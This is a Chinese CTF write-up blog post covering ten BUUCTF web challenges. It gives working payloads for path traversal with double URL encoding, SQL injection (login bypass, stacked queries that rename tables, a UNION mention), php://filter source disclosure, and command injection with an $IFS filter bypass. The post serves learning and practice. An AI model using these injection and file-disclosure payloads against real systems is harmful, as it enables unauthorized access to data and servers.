生活所迫,从头捡回来
第一题:
CTF-BUUCTF-[HCTF 2018]WarmUp
php代码审计题
四个if判断 只有最后一个走得通,就是把第二个?进行2次url加密
然后得到%253f
然后构造payload:file=source.php?file=source.php%253f../../../../../ffffllllaaaagggg
这样flag就出来了
第二题:
[极客大挑战 2019]EasySQL
万能密码直接出
第三题
[强网杯 2019]随便注
堆叠注入 很早之前写过的题了
最后就是word
可以显示一串数字
的表不能显示
然后rename
把一串数字的表名改成word
把原本的word
改成其他的,最后1' or 1=1 #
弄出来
1';rename tables `words` to `words1`;
rename tables `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);#
1' or 1=1 #
第四题
[极客大挑战 2019]Havefun
F12 然后?cat=dog
第五题
[SUCTF 2019]EasySQL
没过滤;有个特殊解法*,1
后端代码猜测是:
select $_GET['query'] || flag from flag
第六题:
[ACTF2020 新生赛]Include
Can you find out the flag?
就是那个把flag.php通过base64加密之后输出出来。
?file=php://filter/convert.base64-encode/resource=flag.php
然后去解密就是flag
第七题:
[极客大挑战 2019]Secret File
F12 跳转 抓包 secr3t.php
然后提示在flag.php里面
直接:file=php://filter/convert.base64-encode/resource=flag.php
第八题:
[极客大挑战 2019]LoveSQL
最简单的联合注入了,啥东西都没有
第九题:
[ACTF2020 新生赛]Exec
简单管道符 cat /flag
第十题:
[GXYCTF2019]Ping Ping Ping
?ip=127.0.0.1;cat$IFS$1`ls`
if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
转载:https://blog.csdn.net/kuller_Yan/article/details/116430651
查看评论